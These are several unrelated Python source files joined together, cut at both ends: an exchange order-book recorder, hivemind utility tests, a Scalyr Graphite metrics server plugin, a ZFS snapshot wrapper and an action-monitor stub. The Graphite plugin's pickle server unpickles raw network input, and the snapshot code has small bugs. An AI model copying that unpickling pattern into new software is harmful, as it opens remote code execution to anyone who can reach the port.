data_to_append[symbol] = []
data_to_append[symbol].append(append_msg)
for symbol, append_msgs in data_to_append.items():
append_msg = "".join(append_msgs)
self.file_manager.save_data_to_file(self.exchange,
stream,
symbol,
append_msg)
def save_level2_orderbook(self, message):
stream = message['table'].split('/')[1]
data_to_append = {}
for data in message['data']:
symbol = data['instrument_id']
time_stamp = data['timestamp']
append_msg = ""
for ask in data['asks']:
append_msg += "{},{},-{},{}\n".format(time_stamp, ask[0], ask[1], ask[2])
for ask in data['bids']:
append_msg += "{},{},{},{}\n".format(time_stamp, ask[0], ask[1], ask[2])
if not data_to_append.get(symbol, None):
data_to_append[symbol] = []
data_to_append[symbol].append(append_msg)
for symbol, append_msgs in data_to_append.items():
append_msg = "".join(append_msgs)
self.file_manager.save_data_to_file(self.exchange,
stream,
symbol,
append_msg)
def __on_message(self, ws, message):
if message is None:
return
try:
self.last_msg_time = int(time())
message = self.inflate(message)
message = json.loads(message.decode("utf-8"))
if message['table'] == 'spot/depth':
if message['action'] == 'update':
self.save_level2_orderbook(message)
elif message['table'] == 'spot/trade':
self.save_trade(message)
except Exception as e:
logger.debug(str(e))
def __on_error(self, ws, error):
self.on_error = True
logger.error("On error\n{}\n{} {}".format(self.node,
self.exchange,
error))
def __on_close(self, ws):
logger.info("On close\n{}".format(self.exchange))
def __on_open(self, ws):
logger.info("On Open\n{}".format(self.exchange))
if self.stream:
self.ws.send(json.dumps(self.stream))
else:
logger.error('%s. Stream is not initialized', self.exchange)
def close_socket(self):
self.exited = True
if self.ws:
self.ws.close()
|
test_util_modules.py
|
import asyncio
import concurrent.futures
import multiprocessing as mp
import random
import time
import numpy as np
import pytest
import torch
import hivemind
from hivemind.proto.dht_pb2_grpc import DHTStub
from hivemind.proto.runtime_pb2 import CompressionType
from hivemind.proto.runtime_pb2_grpc import ConnectionHandlerStub
from hivemind.utils import DHTExpiration, HeapEntry, MSGPackSerializer, ValueWithExpiration
from hivemind.utils.asyncio import achain, aenumerate, aiter, amap_in_executor, anext, azip
from hivemind.utils.compression import deserialize_torch_tensor, serialize_torch_tensor
from hivemind.utils.mpfuture import InvalidStateError
@pytest.mark.forked
def test_mpfuture_result():
future = hivemind.MPFuture()
def _proc(future):
with pytest.raises(RuntimeError):
future.result() # only creator process can await result
future.set_result(321)
p = mp.Process(target=_proc, args=(future,))
p.start()
p.join()
assert future.result() == 321
assert future.exception() is None
assert future.cancel() is False
assert future.done() and not future.running() and not future.cancelled()
future = hivemind.MPFuture()
with pytest.raises(concurrent.futures.TimeoutError):
future.result(timeout=1e-3)
future.set_result(["abacaba", 123])
assert future.result() == ["abacaba", 123]
@pytest.mark.forked
def test_mpfuture_exception():
future = hivemind.MPFuture()
with pytest.raises(concurrent.futures.TimeoutError):
future.exception(timeout=1e-3)
def _proc(future):
future.set_exception(NotImplementedError())
p = mp.Process(target=_proc, args=(future,))
p.start()
p.join()
assert isinstance(future.exception(), NotImplementedError)
with pytest.raises(NotImplementedError):
future.result()
assert future.cancel() is False
assert future.done() and not future.running() and not future.cancelled()
@pytest.mark.forked
def test_mpfuture_cancel():
future = hivemind.MPFuture()
assert not future.cancelled()
future.cancel()
evt = mp.Event()
def _proc():
with pytest.raises(concurrent.futures.CancelledError):
future.result()
with pytest.raises(concurrent.futures.CancelledError):
future.exception()
with pytest.raises(InvalidStateError):
future.set_result(123)
with pytest.raises(InvalidStateError):
future.set_exception(NotImplementedError())
assert future.cancelled() and future.done() and not future.running()
evt.set()
p = mp.Process(target=_proc)
p.start()
p.join()
assert evt.is_set()
@pytest.mark.forked
def test_mpfuture_status():
evt = mp.Event()
future = hivemind.MPFuture()
def _proc1(future):
assert future.set_running_or_notify_cancel() is True
evt.set()
p = mp.Process(target=_proc1, args=(future,))
p.start()
p.join()
assert evt.is_set()
evt.clear()
assert future.running() and not future.done() and not future.cancelled()
with pytest.raises(InvalidStateError):
future.set_running_or_notify_cancel()
future = hivemind.MPFuture()
assert future.cancel()
def _proc2(future):
assert not future.running() and future.done() and future.cancelled()
assert future.set_running_or_notify_cancel() is False
evt.set()
p = mp.Process(target=_proc2, args=(future,))
p.start()
p.join()
evt.set()
future2 = hivemind.MPFuture()
future2.cancel()
assert future2.set_running_or_notify_cancel() is False
@pytest.mark.asyncio
async def test_await_mpfuture():
# await result from the same process, but a different coroutine
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
async def wait_and_assign_async():
assert f2.set_running_or_notify_cancel() is True
await asyncio.sleep(0.1)
f1.set_result((123, "ololo"))
f2.set_result((456, "pyshpysh"))
asyncio.create_task(wait_and_assign_async())
assert (await asyncio.gather(f1, f2)) == [(123, "ololo"), (456, "pyshpysh")]
# await result from separate processes
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_assign(future, value):
time.sleep(0.1 * random.random())
future.set_result(value)
p1 = mp.Process(target=wait_and_assign, args=(f1, "abc"))
p2 = mp.Process(target=wait_and_assign, args=(f2, "def"))
for p in p1, p2:
p.start()
assert (await asyncio.gather(f1, f2)) == ["abc", "def"]
for p in p1, p2:
p.join()
# await cancel
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_cancel():
time.sleep(0.01)
f2.set_result(123456)
time.sleep(0.1)
f1.cancel()
p = mp.Process(target=wait_and_cancel)
p.start()
with pytest.raises(asyncio.CancelledError):
# note: it is intended that MPFuture raises Cancel
await asyncio.gather(f1, f2)
p.join()
# await exception
f1, f2 = hivemind.MPFuture(), hivemind.MPFuture()
def wait_and_raise():
time.sleep(0.01)
f2.set_result(123456)
time.sleep(0.1)
f1.set_exception(ValueError("we messed up"))
p = mp.Process(target=wait_and_raise)
p.start()
with pytest.raises(ValueError):
# note: it is intended that MPFuture raises Cancel
await asyncio.gather(f1, f2)
p.join()
@pytest.mark.forked
def test_mpfuture_bidirectional():
evt = mp.Event()
future_from_main = hivemind.MPFuture()
def _future_creator():
future_from_fork = hivemind.MPFuture()
future_from_main.set_result(("abc", future_from_fork))
if future_from_fork.result() == ["we", "need", "to", "go", "deeper"]:
evt.set()
p = mp.Process(target=_future_creator)
p.start()
out = future_from_main.result()
assert isinstance(out[1], hivemind.MPFuture)
out[1].set_result(["we", "need", "to", "go", "deeper"])
p.join()
assert evt.is_set()
@pytest.mark.forked
def test_mpfuture_done_callback():
receiver, sender = mp.Pipe(duplex=False)
events = [mp.Event() for _ in range(6)]
def _future_creator():
future1, future2, future3 = hivemind.MPFuture(), hivemind.MPFuture(), hivemind.MPFuture()
def _check_result_and_set(future):
assert future.done()
assert future.result() == 123
events[0].set()
future1.add_done_callback(_check_result_and_set)
future1.add_done_callback(lambda future: events[1].set())
future2.add_done_callback(lambda future: events[2].set())
future3.add_done_callback(lambda future: events[3].set())
sender.send((future1, future2))
future2.cancel() # trigger future2 callback from the same process
events[0].wait()
future1.add_done_callback(
lambda future: events[4].set()
) # schedule callback after future1 is already finished
events[5].wait()
p = mp.Process(target=_future_creator)
p.start()
future1, future2 = receiver.recv()
future1.set_result(123)
with pytest.raises(RuntimeError):
future1.add_done_callback(lambda future: (1, 2, 3))
assert future1.done() and not future1.cancelled()
assert future2.done() and future2.cancelled()
for i in 0, 1, 4:
events[i].wait(1)
assert events[0].is_set() and events[1].is_set() and events[2].is_set() and events[4].is_set()
assert not events[3].is_set()
events[5].set()
p.join()
@pytest.mark.forked
def test_many_futures():
evt = mp.Event()
receiver, sender = mp.Pipe()
main_futures = [hivemind.MPFuture() for _ in range(1000)]
assert len(hivemind.MPFuture._active_futures) == 1000
def _run_peer():
fork_futures = [hivemind.MPFuture() for _ in range(500)]
assert len(hivemind.MPFuture._active_futures) == 500
for i, future in enumerate(random.sample(main_futures, 300)):
if random.random() < 0.5:
future.set_result(i)
else:
future.set_exception(ValueError(f"{i}"))
sender.send(fork_futures[:-100])
for future in fork_futures[-100:]:
future.cancel()
evt.wait()
assert len(hivemind.MPFuture._active_futures) == 200
for future in fork_futures:
if not future.done():
future.set_result(123)
assert len(hivemind.MPFuture._active_futures) == 0
p = mp.Process(target=_run_peer)
p.start()
some_fork_futures = receiver.recv()
assert len(hivemind.MPFuture._active_futures) == 700
for future in some_fork_futures:
future.set_running_or_notify_cancel()
for future in random.sample(some_fork_futures, 200):
future.set_result(321)
evt.set()
for future in main_futures:
future.cancel()
assert len(hivemind.MPFuture._active_futures) == 0
p.join()
def test_tensor_compression(size=(128, 128, 64), alpha=5e-08, beta=0.0008):
torch.manual_seed(0)
X = torch.randn(*size)
assert torch.allclose(deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.NONE)), X)
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.MEANSTD_16BIT)) - X
assert error.square().mean() < alpha
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.FLOAT16)) - X
assert error.square().mean() < alpha
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.QUANTILE_8BIT)) - X
assert error.square().mean() < beta
error = deserialize_torch_tensor(serialize_torch_tensor(X, CompressionType.UNIFORM_8BIT)) - X
assert error.square().mean() < beta
zeros = torch.zeros(5, 5)
for compression_type in CompressionType.values():
assert deserialize_torch_tensor(serialize_torch_tensor(zeros, compression_type)).isfinite().all()
@pytest.mark.forked
@pytest.mark.asyncio
async def test_channel_cache():
hivemind.ChannelCache.MAXIMUM_CHANNELS = 3
hivemind.ChannelCache.EVICTION_PERIOD_SECONDS = 0.1
c1 = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
c2 = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=True)
c3 = hivemind.ChannelCache.get_stub("localhost:1338", DHTStub, aio=False)
c3_again = hivemind.ChannelCache.get_stub("localhost:1338", DHTStub, aio=False)
c1_again = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
c4 = hivemind.ChannelCache.get_stub("localhost:1339", DHTStub, aio=True)
c2_anew = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=True)
c1_yetagain = hivemind.ChannelCache.get_stub("localhost:1337", DHTStub, aio=False)
await asyncio.sleep(0.2)
c1_anew = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=DHTStub)
c1_anew_again = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=DHTStub)
c1_otherstub = hivemind.ChannelCache.get_stub(target="localhost:1337", aio=False, stub_type=ConnectionHandlerStub)
await asyncio.sleep(0.05)
c1_otherstub_again = hivemind.ChannelCache.get_stub(
target="localhost:1337", aio=False, stub_type=ConnectionHandlerStub
)
all_channels = [c1, c2, c3, c4, c3_again, c1_again, c2_anew, c1_yetagain, c1_anew, c1_anew_again, c1_otherstub]
assert all(isinstance(c, DHTStub) for c in all_channels[:-1])
assert isinstance(all_channels[-1], ConnectionHandlerStub)
assert "aio" in repr(c2.rpc_find)
assert "aio" not in repr(c1.rpc_find)
duplicates = {
(c1, c1_again),
(c1, c1_yetagain),
(c1_again, c1_yetagain),
(c3, c3_again),
(c1_anew, c1_anew_again),
(c1_otherstub, c1_otherstub_again),
}
for i in range(len(all_channels)):
for j in range(i + 1, len(all_channels)):
ci, cj = all_channels[i], all_channels[j]
assert (ci is cj) == ((ci, cj) in duplicates), (i, j)
def test_serialize_tensor():
tensor = torch.randn(512, 12288)
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.NONE)
for chunk_size in [1024, 64 * 1024, 64 * 1024 + 1, 10 ** 9]:
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor)
chunk_size = 30 * 1024
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.FLOAT16)
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor, rtol=0, atol=1e-2)
tensor = torch.randint(0, 100, (512, 1, 1))
serialized_tensor = serialize_torch_tensor(tensor, CompressionType.NONE)
chunks = list(hivemind.split_for_streaming(serialized_tensor, chunk_size))
assert len(chunks) == (len(serialized_tensor.buffer) - 1) // chunk_size + 1
restored = hivemind.combine_from_streaming(chunks)
assert torch.allclose(deserialize_torch_tensor(restored), tensor)
scalar = torch.tensor(1.0)
serialized_scalar = serialize_torch_tensor(scalar, CompressionType.NONE)
assert torch.allclose(deserialize_torch_tensor(serialized_scalar), scalar)
serialized_scalar = serialize_torch_tensor(scalar, CompressionType.FLOAT16)
assert torch.allclose(deserialize_torch_tensor(serialized_scalar), scalar)
def test_serialize_tuple():
test_pairs = (
((1, 2, 3), [1, 2, 3]),
(("1", False, 0), ["1", False, 0]),
(("1", False, 0), ("1", 0, 0)),
(("1", b"qq", (2, 5, "0")), ["1", b"qq", (2, 5, "0")]),
)
for first, second in test_pairs:
assert MSGPackSerializer.loads(MSGPackSerializer.dumps(first)) == first
assert MSGPackSerializer.loads(MSGPackSerializer.dumps(second)) == second
assert MSGPackSerializer.dumps(first) != MSGPackSerializer.dumps(second)
def test_split_parts():
tensor = torch.randn(910, 512)
serialized_tensor_part = serialize_torch_tensor(tensor, allow_inplace=False)
chunks1 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 16384))
assert len(chunks1) == int(np.ceil(tensor.numel() * tensor.element_size() / 16384))
chunks2 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 10_000))
assert len(chunks2) == int(np.ceil(tensor.numel() * tensor.element_size() / 10_000))
chunks3 = list(hivemind.utils.split_for_streaming(serialized_tensor_part, 10 ** 9))
assert len(chunks3) == 1
compressed_tensor_part = serialize_torch_tensor(tensor, CompressionType.FLOAT16, allow_inplace=False)
chunks4 = list(hivemind.utils.split_for_streaming(compressed_tensor_part, 16384))
assert len(chunks4) == int(np.ceil(tensor.numel() * 2 / 16384))
combined1 = hivemind.utils.combine_from_streaming(chunks1)
combined2 = hivemind.utils.combine_from_streaming(iter(chunks2))
combined3 = hivemind.utils.combine_from_streaming(chunks3)
combined4 = hivemind.utils.combine_from_streaming(chunks4)
for combined in combined1, combined2, combined3:
assert torch.allclose(tensor, deserialize_torch_tensor(combined), rtol=1e-5, atol=1e-8)
assert torch.allclose(tensor, deserialize_torch_tensor(combined4), rtol=1e-3, atol=1e-3)
combined_incomplete = hivemind.utils.combine_from_streaming(chunks4[:5])
combined_incomplete2 = hivemind.utils.combine_from_streaming(chunks4[:1])
combined_incomplete3 = hivemind.utils.combine_from_streaming(chunks4[:-1])
for combined in combined_incomplete, combined_incomplete2, combined_incomplete3:
with pytest.raises(RuntimeError):
deserialize_torch_tensor(combined)
# note: we rely on this being RuntimeError in hivemind.averaging.allreduce.AllreduceRunner
def test_generic_data_classes():
value_with_exp = ValueWithExpiration(value="string_value", expiration_time=DHTExpiration(10))
assert value_with_exp.value == "string_value" and value_with_exp.expiration_time == DHTExpiration(10)
heap_entry = HeapEntry(expiration_time=DHTExpiration(10), key="string_value")
assert heap_entry.key == "string_value" and heap_entry.expiration_time == DHTExpiration(10)
sorted_expirations = sorted([DHTExpiration(value) for value in range(1, 1000)])
sorted_heap_entries = sorted([HeapEntry(DHTExpiration(value), key="any") for value in range(1, 1000)[::-1]])
assert all([entry.expiration_time == value for entry, value in zip(sorted_heap_entries, sorted_expirations)])
@pytest.mark.asyncio
async def test_asyncio_utils():
res = [i async for i, item in aenumerate(aiter("a", "b", "c"))]
assert res == list(range(len(res)))
num_steps = 0
async for elem in amap_in_executor(lambda x: x ** 2, aiter(*range(100)), max_prefetch=5):
assert elem == num_steps ** 2
num_steps += 1
assert num_steps == 100
ours = [elem async for elem in amap_in_executor(max, aiter(*range(7)), aiter(*range(-50, 50, 10)), max_prefetch=1)]
ref = list(map(max, range(7), range(-50, 50, 10)))
assert ours == ref
ours = [row async for row in azip(aiter("a", "b", "c"), aiter(1, 2, 3))]
ref = list(zip(["a", "b", "c"], [1, 2, 3]))
assert ours == ref
async def _aiterate():
yield "foo"
yield "bar"
yield "baz"
iterator = _aiterate()
assert (await anext(iterator)) == "foo"
tail = [item async for item in iterator]
assert tail == ["bar", "baz"]
with pytest.raises(StopAsyncIteration):
await anext(iterator)
assert [item async for item in achain(_aiterate(), aiter(*range(5)))] == ["foo", "bar", "baz"] + list(range(5))
|
graphite_monitor.py
|
# Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
#
# A ScalyrMonitor plugin that acts as a Graphite server, accepting metrics using either the
# text or pickle protocol and sends them to Scalyr.
#
# Note, this can be run in standalone mode by:
# python -m scalyr_agent.run_monitor scalyr_agent.builtin_monitors.graphite_monitor
#
# author: Steven Czerwinski <czerwin@scalyr.com>
__author__ = 'czerwin@scalyr.com'
try:
# noinspection PyPep8Naming
import cPickle as pickle
except ImportError:
import pickle
from scalyr_agent import StoppableThread
from scalyr_agent import ScalyrMonitor, define_config_option, define_log_field
from scalyr_agent.monitor_utils import ServerProcessor, LineRequestParser, Int32RequestParser
__monitor__ = __name__
# Configuration parameters are:
# only_accept_local: (defaults to True)
# accept_plaintext: (defaults to True)
# accept_pickle: (defaults to True)
# plaintext_port: (defaults to 2003)
# pickle_port: (defaults to 2004)
# max_connection_idle_time: (defaults to 300)
# max_request_size: (defaults to 100K)
# buffer_size: (defaults to 100K)
define_config_option(__monitor__, 'module',
'Always ``scalyr_agent.builtin_monitors.graphite_monitor``',
convert_to=str, required_option=True)
define_config_option(__monitor__, 'only_accept_local',
'Optional (defaults to true). If true, then the plugin only accepts connections from localhost. '
'If false, all network connections are accepted.',
default=True, convert_to=bool)
define_config_option(__monitor__, 'accept_plaintext',
'Optional (defaults to true). If true, then the plugin accepts connections in Graphite\'s "plain '
'text" procotol.', default=True, convert_to=bool)
define_config_option(__monitor__, 'accept_pickle',
'Optional (defaults to true). If true, then the plugin accepts connections in Graphite\'s '
'"pickle" procotol.', default=True, convert_to=bool)
define_config_option(__monitor__, 'plaintext_port',
'Optional (defaults to 2003). The port number on which the plugin listens for plain text '
'connections. Unused if ``accept_plaintext`` is false.',
default=2003, min_value=1, max_value=65535, convert_to=int)
define_config_option(__monitor__, 'pickle_port',
'Optional (defaults to 2004). The port number on which the plugin listens for pickle connections. '
'Unused if ``accept_pickle `` is false.',
default=2004, min_value=1, max_value=65535, convert_to=int)
define_config_option(__monitor__, 'max_connection_idle_time',
'Optional (defaults to 300). The maximum number of seconds allowed between requests before the '
'Graphite server will close the connection.', default=300.0, min_value=1, convert_to=float)
define_config_option(__monitor__, 'max_request_size',
'Optional (defaults to 100K). The maximum size of a single request in bytes.', default=100*1024,
min_value=1000, convert_to=int)
define_config_option(__monitor__, 'buffer_size',
'Optional (defaults to 100KB). The maximum buffer size in bytes for buffering incoming requests '
'per connection', default=100*1024, min_value=10*1024, convert_to=int)
define_log_field(__monitor__, 'monitor', 'Always ``graphite_monitor``.')
define_log_field(__monitor__, 'metric', 'The Graphite metric name.')
define_log_field(__monitor__, 'value', 'The Graphite metric value.')
define_log_field(__monitor__, 'orig_time', 'The Graphite timestamp.')
class GraphiteMonitor(ScalyrMonitor):
"""A Scalyr agent monitor acts as a Graphite server, accepting metrics over a network connection and then sends
them to Scalyr.
"""
def _initialize(self):
"""Performs monitor-specific initialization.
"""
self.__only_accept_local = self._config.get('only_accept_local')
self.__accept_plaintext = self._config.get('accept_plaintext')
self.__accept_pickle = self._config.get('accept_pickle')
self.__plaintext_port = self._config.get('plaintext_port')
self.__pickle_port = self._config.get('pickle_port')
self.__max_connection_idle_time = self._config.get('max_connection_idle_time')
self.__max_request_size = self._config.get('max_request_size')
self.__buffer_size = self._config.get('buffer_size')
# We may need an extra thread for this monitor if we are accepting traffic on both the text and pickle
# ports since our server abstractions require a thread per port.
self.__extra_thread = None
if not self.__accept_plaintext and not self.__accept_pickle:
raise Exception('Invalid config state for Graphite Monitor. At least one of accept_plaintext or '
'accept_pickle must be true')
if self.__max_request_size > self.__buffer_size:
raise Exception('The max_request_size of %d cannot be greater than the buffer size of %d' %
(self.__max_request_size, self.__buffer_size))
def run(self):
# We have to (maybe) start up two servers. Since each server requires its own thread, we may have
# to create a new one (since we can use this thread to run one of the servers).
if self.__accept_plaintext:
text_server = GraphiteTextServer(self.__only_accept_local, self.__plaintext_port, self._run_state,
self.__buffer_size, self.__max_request_size,
self.__max_connection_idle_time, self._logger)
else:
text_server = None
if self.__accept_pickle:
pickle_server = GraphitePickleServer(self.__only_accept_local, self.__pickle_port, self._run_state,
self.__buffer_size, self.__max_request_size,
self.__max_connection_idle_time, self._logger)
else:
pickle_server = None
if not self.__accept_plaintext:
pickle_server.run()
elif not self.__accept_pickle:
text_server.run()
else:
# If we are accepting both kinds of traffic, we need a second thread to handle one of the ports.. the
# other one will be handled by this thread.
# noinspection PyAttributeOutsideInit
self.__extra_thread = StoppableThread(target=text_server.run, name='Graphite monitor text server thread')
self.__extra_thread.start()
pickle_server.run()
def stop(self, wait_on_join=True, join_timeout=5):
# The order here is important. Since our servers use self._run_state to know when to stop, we need to
# invoke the inherited method first since that is what actually stops self._run_state. Then we can join
# on the threads.
ScalyrMonitor.stop(self, wait_on_join=wait_on_join, join_timeout=join_timeout)
if self.__extra_thread is not None:
self.__extra_thread.stop(wait_on_join=wait_on_join, join_timeout=join_timeout)
class GraphiteTextServer(ServerProcessor):
"""Accepts connections on a server socket and handles them using Graphite's plaintext protocol format, emitting
the received metrics to the log.
"""
def __init__(self, only_accept_local, port, run_state, buffer_size, max_request_size,
max_connection_idle_time, logger):
"""Creates a new instance.
@param only_accept_local: If true, only accept local connections.
@param port: The port on which to accept connections.
@param run_state: The run_state to use to control when this server should stop accepting connections and new
requests. If 'run_state's 'stop' method is invoked, then 'run' will terminate.
@param buffer_size: The maximum buffer size for buffering incoming requests per connection.
@param max_request_size: The maximum size of an individual request. If this is exceeded, then the connection
responsible is terminated.
@param max_connection_idle_time: The maximum time to wait on a connection between requests before closing it.
@param logger: The logger to use to record errors and metrics.
"""
self.__logger = logger
self.__parser = LineRequestParser(max_request_size)
ServerProcessor.__init__(self, port, localhost_socket=only_accept_local, max_request_size=max_request_size,
max_connection_idle_time=max_connection_idle_time,
buffer_size=buffer_size, run_state=run_state)
def execute_request(self, request):
try:
# This is how the carbon graphite server parses the line. We could be more forgiving but if it works
# for them, then we can do it as well.
metric, value, orig_timestamp = request.strip().split()
value = float(value)
orig_timestamp = float(orig_timestamp)
# Include the time that the original graphite request said to associate with the metric value.
self.__logger.emit_value(metric, value, extra_fields={'orig_time': orig_timestamp})
except ValueError:
self.__logger.warn('Could not parse incoming metric line from graphite plaintext server, ignoring',
error_code='graphite_monitor/badPlainTextLine')
def parse_request(self, request_input, num_available_bytes):
return self.__parser.parse_request(request_input, num_available_bytes)
def report_connection_problem(self, exception):
self.__logger.exception('Exception seen while processing Graphite connect on text port, '
'closing connection: "%s"' % str(exception))
class GraphitePickleServer(ServerProcessor):
"""Accepts connections on a server socket and handles them using Graphite's pickle protocol format, emitting
the received metrics to the log.
"""
def __init__(self, only_accept_local, port, run_state, buffer_size, max_request_size,
max_connection_idle_time, logger):
"""Creates a new instance.
@param only_accept_local: If true, only accept local connections.
@param port: The port on which to accept connections.
@param run_state: The run_state to use to control when this server should stop accepting connections and new
requests. If 'run_state's 'stop' method is invoked, then 'run' will terminate.
@param buffer_size: The maximum buffer size for buffering incoming requests per connection.
@param max_request_size: The maximum size of an individual request. If this is exceeded, then the connection
responsible is terminated.
@param max_connection_idle_time: The maximum time to wait on a connection between requests before closing it.
@param logger: The logger to use to record errors and metrics.
"""
self.__logger = logger
self.__request_parser = Int32RequestParser(max_request_size)
ServerProcessor.__init__(self, port, localhost_socket=only_accept_local, max_request_size=max_request_size,
max_connection_idle_time=max_connection_idle_time, buffer_size=buffer_size,
run_state=run_state)
def execute_request(self, request):
# noinspection PyBroadException
try:
# Use pickle to read the binary data.
data_object = pickle.loads(request)
except: # pickle.loads is document as raising any type of exception, so have to catch them all.
self.__logger.warn('Could not parse incoming metric line from graphite pickle server, ignoring',
error_code='graphite_monitor/badUnpickle')
return
try:
# The format should be [[ metric [ timestamp, value]] ... ]
for (metric, datapoint) in data_object:
value = float(datapoint[1])
orig_timestamp = float(datapoint[0])
self.__logger.emit_value(metric, value, extra_fields={'orig_time': orig_timestamp})
except ValueError:
self.__logger.warn('Could not parse incoming metric line from graphite pickle server, ignoring',
error_code='graphite_monitor/badPickleLine')
def parse_request(self, request_input, num_available_bytes):
return self.__request_parser.parse_request(request_input, num_available_bytes)
def report_connection_problem(self, exception):
self.__logger.exception(
'Exception seen while processing Graphite connect on pickle port, closing connection: "%s"' %
str(exception))
|
snapshot.py
|
import io
import multiprocessing
import pathlib
import os
import typing
import libzfs
import zonys
import zonys.core
import zonys.core.zfs
import zonys.core.zfs.dataset
import zonys.core.zfs.file_system
class AlreadyExistsError(RuntimeError):
def __init__(self, file_system, name):
handle = Handle(file_system, name)
super().__init__("Snapshot {} already exists".format(str(handle)))
class NotExistError(RuntimeError):
def __init__(self, handle):
super().__init__("Snapshot {} does not exist".format(str(handle)))
class DescriptorIdentifierNotMatch(RuntimeError):
pass
class InvalidDescriptorError(RuntimeError):
pass
class InvalidIdentifierError(RuntimeError):
pass
class Identifier:
def __init__(self, *args):
file_system_identifier = None
name = None
if len(args) == 1:
if isinstance(args[0], str):
values = args[0].split("@")
if len(values) != 2:
raise InvalidIdentifierError()
file_system_identifier = zonys.core.zfs.file_system.Identifier(
values[0]
)
name = values[1]
elif len(args) == 2:
if isinstance(args[0], str) and isinstance(args[1], str):
file_system_identifier = zonys.core.zfs.file_system.Identifier(args[0])
name = args[1]
elif isinstance(args[0], list) and isinstance(args[1], str):
file_system_identifier = zonys.core.zfs.file_system.Identifier(args[0])
name = args[1]
elif isinstance(
args[0], zonys.core.zfs.file_system.Identifier
) and isinstance(args[1], str):
file_system_identifier = args[0]
name = args[1]
if file_system_identifier is None or name is None:
raise InvalidIdentifierError()
self.__file_system_identifier = file_system_identifier
self.__name = name
def __str__(self):
return "{}@{}".format(str(self.file_system_identifier), self.name)
@property
def file_system_identifier(self):
return self.__file_system_identifier
@property
def name(self):
return self.__name
@property
def first(self):
return self.file_system_identifier.first
def exists(self):
try:
handle = self.open()
return True
except:
return False
def create(self):
if self.exists():
raise AlreadyExistsError(self)
libzfs.ZFS().get_dataset(str(self.file_system_identifier)).snapshot(str(self))
return Handle(
libzfs.ZFS().get_snapshot(str(self)),
self,
)
def open(self):
try:
return Handle(libzfs.ZFS().get_snapshot(str(self)), self)
except:
raise NotExistError(self)
class Handle(zonys.core.zfs.dataset.Handle):
def __init__(self, descriptor, identifier=None):
super().__init__(descriptor)
if identifier is None:
identifier = Identifier(self._descriptor.name)
elif self._descriptor.name != str(identifier):
raise DescriptorIdentifierNotMatch(self)
self.__identifier = identifier
@property
def identifier(self):
return self.__identifier
@property
def file_system(self):
return self.identifier.file_system_identifier.open()
@property
def path(self) -> pathlib.Path:
return self.file_system.path.joinpath(
".zfs",
"snapshot",
self.identifier.name,
)
def destroy(self):
self._descriptor.delete()
def clone(self, identifier):
self._descriptor.clone(str(identifier))
return identifier.open()
def rename(self, name: str):
self._descriptor.rename(name)
self.__identifier = Identifier(
self.__identifier.file_system_identifier,
name,
)
def send(
self,
target: typing.Any,
compress: bool = False,
):
flags = set()
if compress:
flags.add(
libzfs.SendFlag.COMPRESS,
)
send = lambda x: self.__descriptor.send(x, flags=flags)
if isinstance(target, int):
send(target)
else:
(destination, source) = os.pipe()
child_process = multiprocessing.Process(
target=Handle.__send_child, args=(send, destination, source)
)
child_process.start()
Handle.__send_parent(target, destination, source)
child_process.join()
@staticmethod
def __send_parent(
target: typing.Any,
destination: int,
source: int,
):
write = None
if isinstance(target, io.TextIOBase):
write = lambda x: target.write(str(x))
elif isinstance(target, io.RawIOBase):
write = target.write
else:
write = target.write
os.close(source)
while True:
data = os.read(destination, 8192)
if len(data) == 0:
break
write(data)
os.close(destination)
@staticmethod
def __send_child(
send: typing.Callable,
destination: int,
source: int,
):
os.close(destination)
send(source)
os.close(source)
|
monitor.py
|
"""MAGI action monitor."""
from Queue import Queue
import threading
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pylab
def get_action_name(action):
"""
Get action name.
@param action: Action
@return action's string name
"""
action_name = action.get_name()
action_name = action_name.replace("_", "-")
if action.checkpoint:
action_name += " (Checkpoint)"
return action_name
class ActionResults(object):
"""Action status enum."""
# Unknown - result hasn't been reported yet
UNKNOWN = -1
# Planning for the action failed
FAILURE = 0
# Planning for the action succeeded and the solution
# is deterministic
DETERMINISTIC_SUCCESS = 1
# Planning for the action succeeded but the solution
# is non-deterministic
NONDETERMINISTIC_SUCCESS = 2
def get_color(result):
"""
Convert an action result to an RGB color.
@param result: ActionResults
@return a list of RGB values
"""
# Store colors for success, failure and unknown
# colors taken from the palettable package
# https://jiffyclub.github.io/palettable/
# colorbrewer = palettable.colorbrewer
color_map = {
ActionResults.FAILURE: [215, 48, 39], # red
ActionResults.DETERMINISTIC_SUCCESS: [49, 130, 189], # blue
ActionResults.NONDETERMINISTIC_SUCCESS: [26, 152, 80] # green
}
color = color_map.get(result, [240, 240, 240]) # unknown=grey
return [float(c) / 255. for c in color]
class MonitorUpdateRequest(object):
